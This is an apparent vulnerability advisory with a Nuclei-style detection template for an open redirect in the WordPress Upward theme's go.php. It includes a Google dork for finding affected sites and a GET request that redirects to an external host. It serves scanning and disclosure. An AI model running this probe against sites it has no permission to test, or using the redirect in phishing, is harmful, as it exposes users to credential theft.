WordPress Upward Themes 1.5 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
PoC代码[已公开]
id: wp-upward-theme-redirect
info:
name: WordPress Upward Themes <1.5 - Open Redirect
author: r3Y3r53
severity: medium
description: |
WordPress Upward Themes 1.5 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
reference:
- https://cxsecurity.com/issue/WLB-2020030133
metadata:
verified: true
max-request: 1
google-query: inurl:"/wp-content/themes/Upward/"
tags: wordpress,wp-theme,wp,upward,redirect,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/Upward/go.php?https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4b0a00483046022100c05492834087fd1cb08737c5f6072f275a33aba17eb2891226f2d3905312b97a022100a00c9f179b66bc48a3786e5d95a7b5eef5e881234abd8e2af3aa070cd16038ad:922c64590222798bb761d5b6d8e72950